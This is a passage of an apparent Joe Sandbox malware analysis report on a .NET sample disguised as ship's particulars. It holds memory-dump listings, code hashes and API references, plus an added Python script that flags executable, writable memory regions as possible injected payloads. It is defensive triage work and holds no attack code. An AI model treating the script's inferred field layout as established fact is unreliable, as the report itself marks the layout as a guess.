                                                                                                                  • Opcode ID: ec2d8e6e227887aa8b8b7a192684afe4160a1bbc335f4c8ec2384d20a94dd3d4
                                                                                                                  • Instruction ID: 8609b96ab3e950b9f1c6b4d9e024d4ecbf752ebe3afebec7f8c2b2f109c8f1e7
                                                                                                                  • Opcode Fuzzy Hash: ec2d8e6e227887aa8b8b7a192684afe4160a1bbc335f4c8ec2384d20a94dd3d4
                                                                                                                  • Instruction Fuzzy Hash: 14625E30A0020A8FCB55EF68D590A5EB7B2FF85304F208A68D415DF769DB75ED86CB81
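                                                                                                                  The Memory Dump Source entries above record where each disassembled region was carved from. For triage, the two fields that matter are the protection value in the file name (00000040) and "based on PE: false": together they describe an executable, writable region that is not backed by a loaded image, which is exactly where unpacked or injected payload code ends up. The block below is an added example, not part of the Joe Sandbox report or its tooling, that decodes those .sdmp names and flags such regions. The field layout is inferred from the names on this page: field 1 as the PID and field 4 as the base address (both agree with the report's process numbering and Offset values), field 5 read as a Win32 PAGE_* constant and field 7 as a MEM_* type constant; fields 2, 3, 6 and 8 are kept raw because their meaning is not established here.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) file names and flag regions that look
like unpacked or injected code.

Added example, not Joe Sandbox code. Field layout is an inference from the names
on this page: field 1 = PID, field 4 = base address (both match the report),
field 5 assumed to be a PAGE_* protection constant (0x40 = PAGE_EXECUTE_READWRITE),
field 7 assumed to be a MEM_* type constant (0x20000 = MEM_PRIVATE).
Fields 2, 3, 6 and 8 are not interpreted.
"""
from dataclasses import dataclass
import re

# Win32 page protection constants (winnt.h); low byte of the protection value.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = ((0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"), (0x400, "PAGE_WRITECOMBINE"))

# MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\.(?P<f3>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    base: int
    protect: int
    mem_type: int
    raw_fields: tuple  # fields 2, 3, 6, 8 as found, uninterpreted

    @property
    def protect_name(self) -> str:
        name = PAGE_PROTECT.get(self.protect & 0xFF, f"UNKNOWN(0x{self.protect & 0xFF:x})")
        mods = [m for bit, m in PAGE_MODIFIERS if self.protect & bit]
        return "|".join([name] + mods)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"UNKNOWN(0x{self.mem_type:x})")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # any PAGE_EXECUTE* variant

    @property
    def writable(self) -> bool:
        return bool(self.protect & (0x04 | 0x08 | 0x40 | 0x80))


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split a .sdmp file name into its fields (PID parsed as hex; an assumption)."""
    m = _SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    return DumpRegion(pid=int(m["pid"], 16), base=int(m["base"], 16),
                      protect=int(m["protect"], 16), mem_type=int(m["memtype"], 16),
                      raw_fields=(m["f2"], m["f3"], m["f6"], m["f8"]))


def looks_like_injected_code(region: DumpRegion, based_on_pe: bool) -> bool:
    """Executable + writable memory that is not an image mapping is the usual home
    of unpacked or injected payloads. Caveat: .NET processes also JIT into RWX
    private heaps, so for a managed sample treat this as a triage hint, not a
    verdict; the report's Yara and API evidence is what confirms it."""
    return (region.executable and region.writable
            and region.type_name != "MEM_IMAGE" and not based_on_pe)


# Constructed from the "Source File" entries on this page (name, based_on_pe).
SAMPLE_DUMPS = [
    ("00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp", False),
    ("00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp", False),
    ("00000004.00000002.4191623939.00000000051E0000.00000040.00000800.00020000.00000000.sdmp", False),
]


def triage(dumps=SAMPLE_DUMPS):
    """Return one (name, pid, base, protect_name, type_name, flagged) row per dump."""
    rows = []
    for name, based_on_pe in dumps:
        r = parse_sdmp_name(name)
        rows.append((name, r.pid, r.base, r.protect_name, r.type_name,
                     looks_like_injected_code(r, based_on_pe)))
    return rows


if __name__ == "__main__":
    for name, pid, base, prot, typ, flagged in triage():
        mark = "  <-- RWX, not image-backed" if flagged else ""
        print(f"pid={pid} base=0x{base:08X} {prot} {typ}{mark}")
```

                                                                                                                  All three regions on this page decode to PID 4, PAGE_EXECUTE_READWRITE, MEM_PRIVATE and are flagged. Because the sample is a .NET executable, some RWX private regions will be the runtime's own JIT code heap, so the flag narrows the dumps worth opening in IDA rather than proving injection on its own.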

                                                                                                                  Control-flow Graph
                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph (graph image; node and edge list not reproduced): function 06914B70-069152BB, calls 06915419 (1 site)
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: fkq$XPkq$\Okq
                                                                                                                  • API String ID: 0-673657909
                                                                                                                  • Opcode ID: f4ebdcdbeaa07d44df0a2f29954a540945f9346d700855a26a97d7de41d9fa5b
                                                                                                                  • Instruction ID: 19b6d7ad2baacf403d73ba153cd0b84f18e47bdffc404accce5ef9d879402e9a
                                                                                                                  • Opcode Fuzzy Hash: f4ebdcdbeaa07d44df0a2f29954a540945f9346d700855a26a97d7de41d9fa5b
                                                                                                                  • Instruction Fuzzy Hash: 44618E70E002189FEF549FA9C8547AEBBF6EF88700F20842AE506AB395DF759C45CB50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq
                                                                                                                  • API String ID: 0-2537786760
                                                                                                                  • Opcode ID: 10d1a587c4972047d3f930e648a3ee39db23905949d4ee3f4cfa9a9358654603
                                                                                                                  • Instruction ID: 3cda13456a7efddec0d49ead0688fda887ef8567e521ae867eb1968d97e6a2cf
                                                                                                                  • Opcode Fuzzy Hash: 10d1a587c4972047d3f930e648a3ee39db23905949d4ee3f4cfa9a9358654603
                                                                                                                  • Instruction Fuzzy Hash: 56516434B001069FDB54DF68E9A076E77F6EF85210F248969D819DB398EB30DD42CB90
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0690B176
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: f2c5b3fd0f67e6e686ab391cfef9bf1420c501725687dc81798a5ca69256390f
                                                                                                                  • Instruction ID: e853278768a74da6a994257c626482efa5a2f35ea0862dc6810003e4079f9d5f
                                                                                                                  • Opcode Fuzzy Hash: f2c5b3fd0f67e6e686ab391cfef9bf1420c501725687dc81798a5ca69256390f
                                                                                                                  • Instruction Fuzzy Hash: 91819CB0A00B058FE7A4DF29D44475ABBF5FF88300F108A2DE59AD7A81DB35E845CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4191623939.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_51e0000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 96a36f90b1a4de9fefea5ee944a9c4cb9694eb057d4bb2911a422de35e2f86d3
                                                                                                                  • Instruction ID: 1e1d56fc671bcf2729c0d7f3a8344f0b23636dac164412617c9e30e1273f237b
                                                                                                                  • Opcode Fuzzy Hash: 96a36f90b1a4de9fefea5ee944a9c4cb9694eb057d4bb2911a422de35e2f86d3
                                                                                                                  • Instruction Fuzzy Hash: D8414372D043858FCB14DFA9D4046AEBBB5AFC9310F1486ABD845E7241DB749845CBA1
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0690D202
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: 9aa0645ff9f6214493c38c1eb2ef0697b939e9449137e40477015e0d5bae94fd
                                                                                                                  • Instruction ID: 80a9716fa16356abe44f039b23d5ea6001658cf02e3812c28fa92aeba4b68f22
                                                                                                                  • Opcode Fuzzy Hash: 9aa0645ff9f6214493c38c1eb2ef0697b939e9449137e40477015e0d5bae94fd
                                                                                                                  • Instruction Fuzzy Hash: D541B0B1D003099FDB14CF99C984ADEBFB5BF88310F24812AE819AB250D7759885CF90
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0690D202
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: 22123175440af56bc42c7be16078486cd7692016c68bb6488793d2415b896273
                                                                                                                  • Instruction ID: 9d5dc939a7c0873e01ed276a9ff2364242886dd145851efc2a430f0d88350843
                                                                                                                  • Opcode Fuzzy Hash: 22123175440af56bc42c7be16078486cd7692016c68bb6488793d2415b896273
                                                                                                                  • Instruction Fuzzy Hash: A541B0B1D003099FDB14CF99C984ADEBFB5BF88310F24812AE819AB250D7759885CF90
                                                                                                                  APIs
                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0690F8F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallProcWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2714655100-0
                                                                                                                  • Opcode ID: 3d6e2c6e94fbfc154806b67d91b6d50f126ce9dc479e81f23d00fc4a9860b4f0
                                                                                                                  • Instruction ID: 867906fb041522df8b27ba6012b170cb9af8e9774637f12cc22992fd0c96b14c
                                                                                                                  • Opcode Fuzzy Hash: 3d6e2c6e94fbfc154806b67d91b6d50f126ce9dc479e81f23d00fc4a9860b4f0
                                                                                                                  • Instruction Fuzzy Hash: E3417CB4900309DFDB64CF99C488AAABBF5FF88314F24C459D919A7361C734A945CFA0
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06902B47
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: ade5f98c86f592279b5b7398cc00eb95027cc6e2943e063c39e880111f62311c
                                                                                                                  • Instruction ID: 166d2044acaa8523569b037a28a2374467703d3d23d95849e0eee9d50468984a
                                                                                                                  • Opcode Fuzzy Hash: ade5f98c86f592279b5b7398cc00eb95027cc6e2943e063c39e880111f62311c
                                                                                                                  • Instruction Fuzzy Hash: 412103B5D00209DFDB10CFAAD984AEEBBF4EF48310F14801AE914A7750C378A940CF61
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06902B47
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: 1ea2d2c30a41c1baf58830b73454d82d9e52a346366f55040f8571b654a59755
                                                                                                                  • Instruction ID: 6618bb40e661df2ff333d7751894f48c248dc601c21cf4c3ba8dc1ede89d14d5
                                                                                                                  • Opcode Fuzzy Hash: 1ea2d2c30a41c1baf58830b73454d82d9e52a346366f55040f8571b654a59755
                                                                                                                  • Instruction Fuzzy Hash: 8621C4B5D002499FDB10CF9AD984ADEFBF9EB48320F14841AE914A7350D378A944DF65
                                                                                                                  APIs
                                                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 051EEB9F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4191623939.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_51e0000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1890195054-0
                                                                                                                  • Opcode ID: 02268ccc0c07e109d0222e293b10c65ec34e09779898b60d8acf94966340ab68
                                                                                                                  • Instruction ID: 6c9635bd2d14ac1a83428528a334c5da6934d7c0866bf8218fe49fe5f802e2fb
                                                                                                                  • Opcode Fuzzy Hash: 02268ccc0c07e109d0222e293b10c65ec34e09779898b60d8acf94966340ab68
                                                                                                                  • Instruction Fuzzy Hash: EF11F6B1C006599BCB10CF9AC545BDEFBF8BF48320F14816AD918B7240D378A944CFA5
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0690B176
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: 815b1b4fddaea5f314e38b14bb9f8d6ae156eb9b67147e90e3d57f79c001c63d
• Instruction ID: 12ae90a56969446e8e053993d24e8d7e29b3875ac884ff36309f60fa6641e480
• Opcode Fuzzy Hash: 815b1b4fddaea5f314e38b14bb9f8d6ae156eb9b67147e90e3d57f79c001c63d
• Instruction Fuzzy Hash: EF11D2B6C007498FDB20CF9AC944A9EFBF8EB88324F24841AD519B7650D379A545CFA1
Strings
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID: XPkq
• API String ID: 0-3796509991
• Opcode ID: c9a1021459647e217d84041a6a0d1e9169444d1591f9b4e81b6d46217f4e412f
• Instruction ID: e1cb5f4d9748d04eb6c0844b5d665ff5834747e235b335df737c5a18bab383d3
• Opcode Fuzzy Hash: c9a1021459647e217d84041a6a0d1e9169444d1591f9b4e81b6d46217f4e412f
• Instruction Fuzzy Hash: 6A519270E002189FDB54DFE9C814BAEBBF6EF88700F20852AE145AB395DB745C05CB90
Strings
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID: PHfq
• API String ID: 0-2154135885
• Opcode ID: 47906aab16151e0793dbf410047eb95e29c61de2b598415554ce4745e38e14ce
• Instruction ID: 3cdd649925aa8166d6b437beecfc1369711f69b2717d49be2181b3d7c1e72a32
• Opcode Fuzzy Hash: 47906aab16151e0793dbf410047eb95e29c61de2b598415554ce4745e38e14ce
• Instruction Fuzzy Hash: 90418E70E0020E9FDF55DF65D8846AEBBB6AF85200F304929E402EB640DF74984ADB91
Strings
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID: PHfq
• API String ID: 0-2154135885
• Opcode ID: 4761dd29e4e4099231a9ef729e96d29cf05d031fd252c2eb2ff1e84dda231289
• Instruction ID: 38cbd2a6ab37c896229da5e68998bf20452cd412ae38aa7e50e153d53ad8e959
• Opcode Fuzzy Hash: 4761dd29e4e4099231a9ef729e96d29cf05d031fd252c2eb2ff1e84dda231289
• Instruction Fuzzy Hash: C731C131B002098FDF58AB74D95466E7BA6AF89204F304828D406EF794EF35DD86C7A1
Strings
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID: $fq
• API String ID: 0-12477121
• Opcode ID: c4dd4069e856b0edb360b65838dc7c18cfb6c92e024de17d238f013b591a8b58
• Instruction ID: f01b50b260fd4d23d8033d28fe4dbe15464cc4f530db95ace2450618c7da508d
• Opcode Fuzzy Hash: c4dd4069e856b0edb360b65838dc7c18cfb6c92e024de17d238f013b591a8b58
• Instruction Fuzzy Hash: 2FF08C31B002099FDFA99E58EB8066C73B9EB40254F384825E905DF645C731DE07E791
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 486b104b24c21daa02e3532cf8be5195f8f806a1dfe2c16648d4244a756f5297
• Instruction ID: 7a0757735ef28d687471e11c95896c99e19040df15658876866506772f4d230d
• Opcode Fuzzy Hash: 486b104b24c21daa02e3532cf8be5195f8f806a1dfe2c16648d4244a756f5297
• Instruction Fuzzy Hash: AC924734E002088FDB64EB68C584B5DBBF6FB45314F6484A9D419AF7A5DB35ED81CB80
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 18323394134d3014c4a0f2f46c9fda10e952f2f8508d5414d305c1a6b454e039
• Instruction ID: f80a06e57d3284712d6cc5bc18d535d4f0ad796000e17c8e6e8fc78b45d2cda2
• Opcode Fuzzy Hash: 18323394134d3014c4a0f2f46c9fda10e952f2f8508d5414d305c1a6b454e039
• Instruction Fuzzy Hash: EE619172F005224FDB549B6DCC8066FBAEBAFC4220B254439D80EDB364DE66ED0287D1
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 433170b1b726ea2345e928f4b013a474716d57a4e8ab3d3723a847b854ea83a7
• Instruction ID: 819bb1737a796dea9b378d5791554bdc555814d444cc87b0c926cddf10b1bc40
• Opcode Fuzzy Hash: 433170b1b726ea2345e928f4b013a474716d57a4e8ab3d3723a847b854ea83a7
• Instruction Fuzzy Hash: DE813D34B0020A8FDF44DFA8D59469EB7F6AF89700F248529D40AEF799EB30DC468B51
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1f35eddf63c42ade76e9d9750b223b191378e6b23ae9e7a1b032718f1e64c765
• Instruction ID: 4a0c6fffe65bdc99318b2d350601f9edd7382d2573bb3cc1b1387a8316cdb56f
• Opcode Fuzzy Hash: 1f35eddf63c42ade76e9d9750b223b191378e6b23ae9e7a1b032718f1e64c765
• Instruction Fuzzy Hash: CA914D74E002198BDF60DF68C890B9DB7B1FF89310F208699D549AB395DB70AA85CF91
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e89e0e574d2c58000c05b49ca4e3117dfbc44aa57eaa06998446121d9a831e89
• Instruction ID: f80a6fde31633b18f8a10a54db927e9351e52006a0a2abbc19b8b1cf69a53233
• Opcode Fuzzy Hash: e89e0e574d2c58000c05b49ca4e3117dfbc44aa57eaa06998446121d9a831e89
• Instruction Fuzzy Hash: 34915D74E106198BDF60DF68C880B9DB7B1FF89310F208699D549BB395DB70AA85CF90
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f8e7a4bda062c90090c216c324b8d1e266d2e74ff618a603343d2011b5eddeca
• Instruction ID: 662bbf9f324579349391a09512210a5454475ba5bebff9953ed97341a900ed41
• Opcode Fuzzy Hash: f8e7a4bda062c90090c216c324b8d1e266d2e74ff618a603343d2011b5eddeca
• Instruction Fuzzy Hash: 0461BF31E0010DDFDF54AB78E8942AEBBF6EB84311F30486AE506DB655DB358955CB80
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c78b92cd54e487cb5c4d089b4970563ca2c4a0fbb02a0ac7b51f75cc64cd227e
• Instruction ID: ff03f686d045b922f52b96c3cfac2f1e76858c203e4d4547155d6b3667856ded
• Opcode Fuzzy Hash: c78b92cd54e487cb5c4d089b4970563ca2c4a0fbb02a0ac7b51f75cc64cd227e
• Instruction Fuzzy Hash: 9A712B74B002099FDB54DFA9D980A9EBBF6EF88300F248429E415EB755DB30ED46CB50
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a7f69ad6502cbceb7da0f9ba0e14f594fe3331d104ac8de4d85ae620392721a7
• Instruction ID: a78d0de4eb53fcdbaf9e208be68b5aaab2383c4a725a8c07ac273ed1397fd5a4
• Opcode Fuzzy Hash: a7f69ad6502cbceb7da0f9ba0e14f594fe3331d104ac8de4d85ae620392721a7
• Instruction Fuzzy Hash: 44711974B002099FDB54EFA9D980A9EBBF6EF88300F248429E405EB755DB30ED46CB50
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0af3c98d2c5c626598d2e6b7ec7081475f264fc187345fa2b1b82f6b916b4c55
• Instruction ID: b4ef254817ff4f9f6768f4e90e66403aaafaf62a2354a0aca58d418401a8a85b
• Opcode Fuzzy Hash: 0af3c98d2c5c626598d2e6b7ec7081475f264fc187345fa2b1b82f6b916b4c55
• Instruction Fuzzy Hash: BE516574F2021C9BEFA466FCD8A476F269ED789310F304426D24ACB7D5DA6CCC4197A2
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 258753bcb70b25f10496aec8303fb575235c945307c548f47bddc05bb450e3d6
• Instruction ID: 4ed47bd8ee85bac2edb89d85c76d6e77547433cb2f2d5d4941399795423dd44b
• Opcode Fuzzy Hash: 258753bcb70b25f10496aec8303fb575235c945307c548f47bddc05bb450e3d6
• Instruction Fuzzy Hash: 17515374F2021C9BEFA466FCD89476F269ED789350F304426E20ACB795DE6CCC4157A2
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 33ed3f4e0fe7f843bbe5b0f8ce067068a9a83502beb77e2160da6839f823e87c
• Instruction ID: 201f2cebd7656acce399c8b1b6001010bad327eb8134e2f9526df4fbb0409a9d
• Opcode Fuzzy Hash: 33ed3f4e0fe7f843bbe5b0f8ce067068a9a83502beb77e2160da6839f823e87c
• Instruction Fuzzy Hash: AA4131B1E006099FDF70CE99D8C0AAFF7B6FB84310F21492AE116DB650D731E9558B91
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7a3ae21f8311f15047f3aa636824e7d71a937f6c6d2f49ab9f949a811a4b4ab9
• Instruction ID: de8f18b869335676a2edc9a6d0965abc3e19d452e65dfc7db844ff82709ecdc0
• Opcode Fuzzy Hash: 7a3ae21f8311f15047f3aa636824e7d71a937f6c6d2f49ab9f949a811a4b4ab9
• Instruction Fuzzy Hash: A331A570E1034A9FDF15DF68C99069EBBB5EF85314F208929E805EF745EB70A946CB80
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 52f5b63460a8f7d76fefeb1817a9f8e9897c4faf369aa7320b81f61606f32903
